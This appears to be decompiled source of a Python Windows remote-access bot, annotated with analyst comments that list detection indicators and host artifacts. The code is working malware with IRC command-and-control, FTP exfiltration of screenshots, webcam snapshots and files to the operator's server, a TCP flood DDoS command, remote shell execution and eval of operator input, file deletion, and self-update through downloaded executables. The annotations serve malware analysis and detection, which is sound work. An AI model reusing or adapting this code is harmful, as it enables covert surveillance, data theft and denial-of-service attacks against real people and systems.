- # Embedded file name: C:\Python27\PyInstaller-2.1\clasp\build\clasp\out00-PYZ.pyz\prompt
- from twisted.internet.protocol import ClientFactory
- from twisted.protocols.basic import NetstringReceiver
- from twisted.words.protocols.irc import IRCClient
- from twisted.internet import reactor
- import time, ImageGrab, VideoCapture, ftplib, win32api, psutil
- import config
- import random
- import socket
- from threading import Thread
- from subprocess import Popen
- import datetime
- import os
- import urllib2
- import zipfile
- import hashlib
- import _winreg
- from traceback import format_exc
- # Analyst note: module-level constants. Every path, URL, address and
- # credential used below comes from a separate `config` module that is not
- # part of this listing.
- version = '3.2'
- pcid = None
- debugfilepath = '%s\\debug.log' % config.malware_folder
- _download = config.main_exe_link
- # Per-user autorun location (HKCU Run key). Nothing in this listing reads or
- # writes it, so any persistence step presumably lives in another component;
- # the key is still worth checking during triage.
- _root_key = 'HKEY_CURRENT_USER'
- _key = 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'
- _exename = config.malware_exe
- _exepath = config.malware_folder[3:]
- # rundir = first three characters of the current working directory (the
- # drive prefix on Windows) + the install folder with its own first three
- # characters removed.
- rundir = '%s' + _exepath
- rundir = rundir % os.getcwd()[:3]
- # Analyst note: fallback update check, called from main() in non-debug
- # builds and from core()'s error handler. It fetches a small key=value
- # document from the operator's FTP server or from a Pastebin raw URL and
- # passes the 'update' value to update_program() when 'update' is not the
- # string 'None' and the 'md5' value differs from the MD5 of the installed
- # executable. Indentation was lost in this listing, so the exact nesting of
- # the try/except and return statements cannot be confirmed.
- # Detection: a non-browser process requesting a paste-site raw URL, or a
- # credential-less ftp:// fetch of emergency.dat, are usable network
- # indicators.
- def emergency():
- links = ('ftp://%s:%s/ftproot/emergency.dat' % (config.ftp_ip, config.ftp_port), 'http://pastebin.com/raw.php?i=93kWZuiM')
- emergency_data = None
- for link in links:
- try:
- emergency_data = urllib2.urlopen(link).read()
- break
- except:
- return
- if not emergency_data:
- return
- else:
- # Normalise line endings, then parse one key=value pair per line.
- emergency_data = emergency_data.strip('\n')
- emergency_data = emergency_data.replace('\r', '')
- emergency_data = emergency_data.split('\n')
- emergency_dic = {}
- for item in emergency_data:
- keyvalue = item.split('=')
- emergency_dic[keyvalue[0]] = keyvalue[1]
- # 'md5' is compared with the hash of the running build; a mismatch triggers
- # the update.
- if emergency_dic['update'] != 'None':
- if emergency_dic['md5'] != checksum(config.malware_path):
- update_program(emergency_dic['update'])
- return
- # Analyst note: self-update hand-off. Stops the Twisted reactor (errors
- # ignored), starts updater.exe from the install folder with this process's
- # PID and the download URL as arguments, then sleeps in a loop.
- # updater.exe is not shown here; it presumably replaces the executable and
- # ends this process using the PID (unconfirmed).
- # Detection: process-creation events for updater.exe whose command line
- # carries a numeric PID followed by a URL.
- def update_program(url):
- try:
- reactor.stop()
- except:
- pass
- Popen(['%s\\updater.exe' % config.malware_folder, str(os.getpid()), url])
- while True:
- time.sleep(999)
- # Analyst note: console output only when config.DEBUG is set; release
- # builds print nothing through this helper.
- def print_debug(string):
- if config.DEBUG:
- print string
- # Analyst note: appends one line to debug.log in the install folder.
- # Host artifact: debug.log, which core() fills with Python tracebacks.
- def log_debugfile(string):
- write(debugfilepath, string + '\n')
- # Analyst note: append helper. Reads the whole existing file (if any) and
- # rewrites it with `data` added at the end.
- def write(path, data):
- if not os.path.isfile(path):
- all = ''
- else:
- f = open(path, 'r')
- all = f.read()
- f.close()
- f = open(path, 'w')
- f.write(all + data)
- f.close()
- # Analyst note: copies the file `origem` (source) into the directory
- # `destino` (destination), keeping its base name. The file is read fully
- # into memory before being written.
- def copyfile(origem, destino):
- nome = origem.split('\\')[-1]
- org = open(origem, 'rb')
- orgread = org.read()
- dest = open(destino + '\\' + nome, 'wb')
- dest.write(orgread)
- dest.close()
- org.close()
- # Analyst note: sets the global bot identifier `pcid`, which this listing
- # also uses as the IRC nickname and as the FTP upload directory name.
- # With an argument, that value is stored; otherwise id.txt in the install
- # folder is reused; otherwise "<hostname>_" plus four random digits is
- # generated and saved.
- # Host artifact: id.txt in the install folder.
- # Network indicator: IRC nicknames of the form <hostname>_NNNN.
- def change_pcid(new_pcid = None):
- global pcid
- idpath = '%s\\id.txt' % config.malware_folder
- if new_pcid:
- pcid = new_pcid
- file = open(idpath, 'w')
- file.write(pcid)
- file.close()
- elif os.path.isfile(idpath):
- file = open(idpath)
- pcid = file.read()
- file.close()
- else:
- pcid = socket.gethostname() + '_'
- for i in range(4):
- pcid += str(random.randint(0, 9))
- file = open(idpath, 'w')
- file.write(pcid)
- file.close()
- # Analyst note: returns the MD5 hex digest of a file. Every caller in this
- # listing passes config.malware_path and compares the result with a value
- # received from the operator, so the digest serves as a build/version
- # marker.
- def checksum(file):
- check = hashlib.md5()
- check.update(open(file, 'rb').read())
- return check.hexdigest()
- # Analyst note: parses "<code>:<pc>[:<pc>...]" and uploads debug.log over
- # FTP when this bot's pcid or 'ALL' is listed and the code has not been seen
- # before (nesting unconfirmed because indentation was lost). No caller
- # appears in this listing.
- def send_debuglog(protocol, debug_request):
- code, pcs = debug_request.split(':', 1)
- pcs = pcs.split(':')
- if code not in protocol.debug_request_codes:
- if pcid in pcs or 'ALL' in pcs:
- uploadftp(debugfilepath)
- protocol.debug_request_codes.append(code)
- # Analyst note: screen capture. Grabs the desktop with ImageGrab, saves it
- # as ss.jpg in rundir, uploads it over FTP and deletes the local copy.
- # Host artifact: ss.jpg exists only for the duration of the upload, so
- # file-creation telemetry is more useful here than a later disk search.
- def ss():
- path = rundir + '\\ss.jpg'
- img = ImageGrab.grab()
- img.save(path, 'JPEG')
- uploadftp(path)
- os.remove(path)
- # Analyst note: archives a whole directory tree into a deflate-compressed
- # zip at output_path. Entry names are made relative to the parent of
- # folder_path. Used by the operator's 'zip' command to stage a folder as a
- # single file.
- def zip_folder(folder_path, output_path):
- parent_folder = os.path.dirname(folder_path)
- contents = os.walk(folder_path)
- zip_file = zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED)
- for root, folders, files in contents:
- for folder_name in folders:
- absolute_path = os.path.join(root, folder_name)
- relative_path = absolute_path.replace(parent_folder + '\\', '')
- zip_file.write(absolute_path, relative_path)
- for file_name in files:
- absolute_path = os.path.join(root, file_name)
- relative_path = absolute_path.replace(parent_folder + '\\', '')
- zip_file.write(absolute_path, relative_path)
- zip_file.close()
- # Analyst note: fetches `url` with urllib2 and writes the body to
- # <path>\<last URL segment>. The local file name is taken from the URL and
- # the content is written as received.
- def download(url, path):
- download = urllib2.urlopen(url)
- f = open(path + '\\' + url.split('/')[-1], 'wb')
- f.write(download.read())
- f.close()
- # Analyst note: exfiltration path used by the screenshot, webcam, debug-log
- # and 'upload' features. Logs in to the operator's FTP server with the
- # credentials from config, changes to ftproot/zombies, creates a directory
- # named after pcid when the LIST output does not show one, and stores the
- # file under its base name.
- # Detection: ftplib.FTP is plain FTP, so the login, MKD and STOR commands
- # are visible in cleartext to network monitoring.
- def uploadftp(path):
- ftp = ftplib.FTP()
- ftp.connect(config.ftp_ip, config.ftp_port)
- ftp.login(config.ftp_user, config.ftp_pass)
- ftp.cwd('ftproot/zombies')
- dirlist = []
- ftp.retrlines('LIST', dirlist.append)
- ok = 0
- for f in dirlist:
- if f.split()[-1] == pcid:
- ok = 1
- if ok == 0:
- ftp.mkd(pcid)
- ftp.cwd(pcid)
- f = open(path, 'rb')
- ftp.storbinary('STOR ' + path.split('\\')[-1], f)
- f.close()
- ftp.quit()
- # Analyst note: recursive directory delete, reached through the operator's
- # 'del' command. Files are removed first, then the directory itself.
- def deldir(path):
- for item in os.listdir(path):
- if os.path.isdir(path + '\\' + item):
- deldir(path + '\\' + item)
- else:
- os.remove(path + '\\' + item)
- os.rmdir(path)
- # Analyst note: flood thread. While protocol.ddosing is true it opens a TCP
- # connection to host:port and sends a 1024-byte buffer of 'a' characters in
- # a loop; socket errors are swallowed (the reconnect behaviour depends on
- # nesting that this listing no longer shows).
- # Network indicator: sustained outbound TCP streams whose payload consists
- # only of 0x61 bytes.
- class DDoS(Thread):
- def start(self, host, port, protocol):
- self.host = host
- self.port = port
- self.protocol = protocol
- Thread.start(self)
- def run(self):
- packet = 'a' * 1024
- while self.protocol.ddosing:
- try:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect((self.host, self.port))
- while True:
- sock.send(packet)
- except socket.error:
- pass
- # Analyst note: repeated screen capture. While obj.ss_stream is true the
- # thread calls ss() (capture, FTP upload, delete) and sleeps `interval`
- # seconds after a successful capture; failures are ignored.
- # Detection: periodic FTP STOR of ss.jpg from the same host.
- class SS_Stream(Thread):
- def start(self, interval, obj):
- self.interval = interval
- self.obj = obj
- Thread.start(self)
- def run(self):
- while self.obj.ss_stream:
- try:
- ss()
- except:
- pass
- else:
- time.sleep(self.interval)
- # Analyst note: IRC command-and-control client. It joins config.irc_channel
- # using pcid as its nickname, reads update instructions from the channel
- # topic, and reacts to these message commands: !ping, !auth, !connect,
- # !ddos, !debug, !update.
- # Detection: IRC traffic from a process that is not an IRC client, the
- # literal command strings above, and the quit message 'Updating...'.
- class IRCProtocol(IRCClient):
- channel = config.irc_channel
- ddosing = False
- updating = False
- force_updating = False
- # Class-level list, so authenticated users are shared by every instance.
- auth = []
- def __init__(self):
- self.nickname = pcid
- def irc_RPL_NAMREPLY(self, prefix, params):
- self.got_names(params[1], params[3].split())
- def got_names(self, channel, names):
- pass
- # Topic format: comma-separated "key|value" pairs. Keys read elsewhere in
- # this class are 'md5' and 'url'.
- def parse_topic(self, key):
- dic = {}
- data = self.irc_topic.split(',')
- for chave in data:
- dic[chave.split('|')[0]] = chave.split('|')[1]
- if dic.has_key(key):
- return dic[key]
- def signedOn(self):
- self.join(self.channel)
- # A topic whose 'md5' differs from the installed executable's MD5 makes a
- # non-debug build quit with 'Updating...'; connectionLost then starts the
- # updater with the topic's 'url'.
- def topicUpdated(self, user, channel, newtopic):
- print_debug('topic updated')
- if channel.lower() != self.channel.lower():
- return
- self.irc_topic = newtopic
- if self.parse_topic('md5') != checksum(config.malware_path):
- if not config.DEBUG:
- self.updating = True
- self.quit('Updating...')
- # Command parser. Indentation was lost in this listing, so which commands
- # sit behind the `user not in self.auth` check cannot be confirmed here.
- def privmsg(self, user, channel, message):
- print_debug('user: ' + user)
- print_debug('message: ' + message)
- if message == '!ping':
- s_user = user.split('!')[0]
- if channel.startswith('#'):
- self.msg(channel, 'Pong!')
- else:
- self.msg(s_user, 'Pong!')
- if user not in self.auth:
- if message.startswith('!auth '):
- password = message.strip('!auth ')
- # Operator password check: SHA-512 over a hard-coded prefix plus the
- # supplied password, compared with config.auth_hash.
- hash = hashlib.sha512('NmQs9UnDRNSbK4cn5eSY' + password).hexdigest()
- print_debug(hash)
- if hash == config.auth_hash:
- print_debug('auth completed')
- self.auth.append(user)
- else:
- print_debug('auth ok')
- # !connect: outbound TCP connection to config.my_ip_ext:config.my_port that
- # carries the PromptSession remote-command protocol.
- if message.startswith('!connect'):
- if not channel.startswith('#') or message.strip('!connect') == ' ' + self.nickname:
- fac = ClientFactory()
- fac.protocol = PromptSession
- reactor.connectTCP(config.my_ip_ext, config.my_port, fac)
- # !ddos <host>:<port> / !ddos stop: toggles the flood flag.
- if message.startswith('!ddos '):
- command = message.strip('!ddos ')
- if command != 'stop':
- if not self.ddosing:
- ddos_host, ddos_port = command.split(':')
- DDoS().start(ddos_host, ddos_port)
- self.ddosing = True
- else:
- self.ddosing = False
- # !debug <nick|ALL>: uploads debug.log over FTP.
- if message.startswith('!debug '):
- command = message.strip('!debug ')
- if self.nickname in command or command == 'ALL':
- uploadftp(debugfilepath)
- # !update <md5>|<url>: forced update when <md5> differs from the installed
- # executable's MD5.
- if message.startswith('!update '):
- command = message[8:].split('|')
- if command[0] != checksum(config.malware_path):
- self.force_updating = command[1]
- self.quit('Updating...')
- def alterCollidedNick(self, nickname):
- newnick = nickname + '_'
- return newnick
- # The updater is launched only after the IRC connection has closed.
- def connectionLost(self, reason):
- if self.updating:
- update_program(self.parse_topic('url'))
- if self.force_updating:
- update_program(self.force_updating)
- # Analyst note: reconnects whenever the IRC connection is lost or fails,
- # with no delay visible in this listing.
- # Detection: repeated connection attempts to the same IRC server and port
- # from one host, including while the server is unreachable.
- class IRCFactory(ClientFactory):
- protocol = IRCProtocol
- def clientConnectionLost(self, connector, reason):
- connector.connect()
- clientConnectionFailed = clientConnectionLost
- # Analyst note: remote-command dispatcher used by PromptSession.
- # receive_command maps a command name to the method func_<name> and returns
- # its result, or the Python traceback, as text for the operator.
- # Capabilities shown: directory browsing and deletion, file read, FTP
- # upload, HTTP download, copy/move, process listing and kill, screenshot and
- # webcam capture, zip/extract, program and shell execution, and eval of an
- # operator-supplied string. Response strings are in Portuguese.
- class CommandHandler():
- # Commands in this tuple receive their arguments re-joined with '|' as one
- # string; all other commands receive the argument list.
- path_cmd_args = ('cd', 'dir', 'ls', 'del', 'mkdir', 'read', 'upload', 'exec', 'zip', 'dirsize', 'setname', 'eval')
- env_var = {'%rundir%': rundir}
- init_cwd = os.getcwd()
- def __init__(self):
- self.ss_stream = False
- os.chdir(self.init_cwd)
- # Returns 0 for 'exit' (the caller closes the session), 'Comando invalido.'
- # (invalid command) for an unknown name, otherwise str() of the result.
- def receive_command(self, command, args):
- command = command.lower()
- if command == 'exit':
- return 0
- try:
- func = getattr(self, 'func_%s' % command)
- except AttributeError:
- return 'Comando invalido.'
- try:
- if command in self.path_cmd_args:
- args = '|'.join(args)
- return str(func(args))
- except:
- return format_exc()
- # Joins a list of strings with newlines.
- def orglist(self, list):
- output = ''
- for item in list:
- output += item + '\n'
- output = output.strip('\n')
- return output
- # Formats a byte count with a unit from B to TB, truncating the decimals.
- def convert_size(self, size):
- def max_len(str, lenght):
- if lenght <= 0:
- lenght = -1
- else:
- lenght += 1
- index = str.find('.')
- if len(str) <= index + lenght:
- return str
- else:
- return str[:index + lenght]
- units = ('B', 'KB', 'MB', 'GB', 'TB')
- final_unit = 0
- current = float(size)
- while current > 1024 and final_unit < len(units) - 1:
- current /= 1024
- final_unit += 1
- return '%s %s' % (max_len(str(current), 2), units[final_unit])
- # Changes the process working directory; '%rundir%' expands to rundir.
- def func_cd(self, args):
- if args in self.env_var.keys():
- os.chdir(self.env_var[args])
- elif args:
- if os.path.isdir(args):
- if not os.path.isabs(args):
- args = os.path.abspath(args)
- else:
- return 'Diretorio invalido.'
- os.chdir(args)
- else:
- path = os.getcwd().split('\\')
- os.chdir('\\'.join(path[:-1]))
- return ''
- # Directory listing: sub-directories first, then files with their sizes.
- def func_dir(self, args):
- if args:
- if os.path.isdir(args):
- path = args
- else:
- return 'Diretorio invalido.'
- else:
- path = os.getcwd()
- dirs = []
- files = []
- for item in os.listdir(path):
- abspath = path + '\\' + item
- if os.path.isdir(abspath):
- dirs.append(item)
- elif os.path.isfile(abspath):
- files.append('%s %s' % (item, self.convert_size(os.path.getsize(abspath))))
- dirs = sorted(dirs)
- files = sorted(files)
- return self.orglist(dirs + files)
- # Deletes a file, or a directory tree through deldir().
- def func_del(self, args):
- if os.path.isfile(args):
- os.remove(args)
- elif os.path.isdir(args):
- deldir(args)
- else:
- return 'Arquivo/diretorio inexistente.'
- return 'Deletado.'
- def func_mkdir(self, args):
- os.mkdir(args)
- return 'Diretorio criado.'
- # Returns the content of a local file to the operator.
- def func_read(self, args):
- f = open(args)
- data = f.read()
- f.close()
- return data
- # Starts a program through subprocess.Popen with the argument list.
- def func_run(self, args):
- Popen(args)
- return 'Executado.'
- # FTP upload of a local file, run in a background thread.
- def func_upload(self, args):
- Thread(target=uploadftp, args=(args,)).start()
- return 'Uploading.'
- # HTTP download into the current directory or into a given path.
- def func_download(self, args):
- if len(args) == 1:
- Thread(target=download, args=(args[0], os.getcwd())).start()
- elif len(args) > 1:
- path = '|'.join(args[1:])
- Thread(target=download, args=(args[0], path)).start()
- return 'Downloading.'
- def func_copy(self, args):
- copyfile(args[0], args[1])
- return 'Copiado.'
- def func_move(self, args):
- self.func_copy(args)
- os.remove(args[0])
- return 'Movido.'
- def func_ss(self, args):
- ss()
- return 'Printed.'
- def func_ping(self, args):
- return 'Pong.'
- def func_version(self, args):
- return version
- def func_pcname(self, args):
- return pcid
- # Runs an operator-supplied command line through os.system, i.e. via the
- # system shell. Detection: shell child processes spawned by this executable.
- def func_exec(self, args):
- exit_code = os.system(args)
- if exit_code == 0:
- return 'Executado.'
- else:
- return exit_code
- def func_proclist(self, args):
- proclist = []
- for proc in psutil.get_process_list():
- proclist.append('%s = %s' % (proc.name, proc.pid))
- return self.orglist(proclist)
- def func_kill(self, args):
- psutil.Process(int(args[0])).kill()
- return 'Killed.'
- # Webcam snapshot through the VideoCapture module, saved as camss.jpg in
- # rundir, uploaded over FTP and then deleted locally.
- def func_camss(self, args):
- path = rundir + '\\camss.jpg'
- cam = VideoCapture.Device()
- cam.saveSnapshot(path, timestamp=3, boldfont=1)
- uploadftp(path)
- os.remove(path)
- return 'Done.'
- # Writes <folder name>.zip into rundir.
- def func_zip(self, args):
- zip_folder(args, '%s\\%s.zip' % (rundir, args.split('\\')[-1]))
- return 'Compactado.'
- # Extracts an archive into a new directory under rundir.
- def func_extract(self, args):
- zip_file = zipfile.ZipFile(args, 'r')
- extractdir = '%s\\%s' % (rundir, args.split('\\')[-1][:-4])
- os.mkdir(extractdir)
- zip_file.extractall(extractdir)
- zip_file.close()
- return 'Extraido.'
- # Lists the logical drives that can be read with os.listdir.
- def func_drives(self, args):
- drives = win32api.GetLogicalDriveStrings().split('\x00')
- if '' in drives:
- drives.remove('')
- drives_out = []
- for drive in drives:
- try:
- os.listdir(drive)
- except:
- pass
- else:
- drives_out.append(drive)
- return self.orglist(drives_out)
- def func_dirsize(self, args):
- if args:
- folder = args
- else:
- folder = os.getcwd()
- folder_size = 0
- for path, dirs, files in os.walk(folder):
- for file in files:
- filename = path + '\\' + file
- folder_size += os.path.getsize(filename)
- return self.convert_size(folder_size)
- # '1 [interval]' starts the SS_Stream thread, '0' stops it, and no argument
- # builds a status string.
- def func_ss_stream(self, args):
- if not len(args):
- stream_state = {True: 'ON',
- False: 'OFF'}
- out = 'Stream: %s' % stream_state[self.ss_stream]
- elif args[0] == '1':
- if not self.ss_stream:
- self.ss_stream = True
- interval = 0
- if len(args) > 1:
- interval = int(args[1])
- SS_Stream().start(interval, self)
- return 'Stream: ON'
- else:
- return 'Already on.'
- elif args[0] == '0':
- self.ss_stream = False
- return 'Stream: OFF'
- # Renames the bot; change_pcid() also rewrites id.txt.
- def func_setname(self, args):
- change_pcid(args)
- return 'Changed: %s' % pcid
- # Evaluates an operator-supplied Python expression inside the bot process.
- def func_eval(self, args):
- if args:
- return eval(args)
- else:
- return 'No arguments.'
- func_ls = func_dir
- func_print = func_ss
- # Analyst note: interactive session protocol carried over the connection
- # opened by the IRC '!connect' command. Messages are netstring-framed. On
- # connect the bot sends "<pcid>|<cwd>"; each request is
- # "<command>|<arg>|..." and each reply is "<output>|<cwd>". A command result
- # of 0 ('exit') closes the connection.
- # Detection: netstring framing (decimal length, ':', payload, ',') on an
- # outbound TCP session whose first client message is "<hostname>_NNNN|<path>".
- class PromptSession(NetstringReceiver):
- def __init__(self):
- self.cmd_handler = CommandHandler()
- def stringReceived(self, string):
- input_list = string.split('|')
- cmd = input_list[0]
- cmd_args = input_list[1:]
- out = self.cmd_handler.receive_command(cmd, cmd_args)
- if out == 0:
- self.transport.loseConnection()
- return
- self.sendString('%s|%s' % (out, os.getcwd()))
- def connectionMade(self):
- self.sendString('%s|%s' % (pcid, os.getcwd()))
- # Clearing the flag ends any running SS_Stream thread.
- def connectionLost(self, reason):
- self.cmd_handler.ss_stream = False
- # Analyst note: startup sequence. Non-debug builds first run the
- # emergency() update check. The bot then loads or generates pcid, creates
- # debug.log with a "Begin: <timestamp>" line when it is missing, downloads
- # updater.exe and the PIL font archive when they are missing (nesting
- # unconfirmed because indentation was lost), and connects to the IRC server
- # from config.
- # Host artifacts in the install folder: debug.log, id.txt, updater.exe,
- # helvB08.pil (pilfonts.zip is deleted after extraction).
- def main():
- if not config.DEBUG:
- emergency()
- print_debug('checkando pcid')
- change_pcid()
- print_debug('checkando debuglog')
- if not os.path.isfile(debugfilepath):
- log_debugfile('Begin: %s\n' % datetime.datetime.now())
- if not config.DEBUG:
- if not os.path.isfile('%s\\updater.exe' % config.malware_folder):
- download(config.malware_updater_link, config.malware_folder)
- if not os.path.isfile('%s\\helvB08.pil' % config.malware_folder):
- zippath = '%s\\pilfonts.zip' % config.malware_folder
- download(config.pil_link, config.malware_folder)
- zip = zipfile.ZipFile(zippath, 'r')
- zip.extractall(config.malware_folder)
- zip.close()
- os.remove(zippath)
- print_debug('starting twisted')
- reactor.connectTCP(config.irc_server, config.irc_port, IRCFactory())
- reactor.run()
- # Analyst note: top-level wrapper around main(). On an exception a non-debug
- # build writes the traceback to debug.log, uploads the log over FTP and
- # runs the emergency() update check; the exception is re-raised (nesting
- # unconfirmed because indentation was lost).
- # Detection: a crash of this process is followed by an FTP upload of
- # debug.log and a fetch of the emergency URLs.
- def core():
- try:
- main()
- except Exception as exc:
- if not config.DEBUG:
- log_debugfile(format_exc())
- uploadftp(debugfilepath)
- emergency()
- raise exc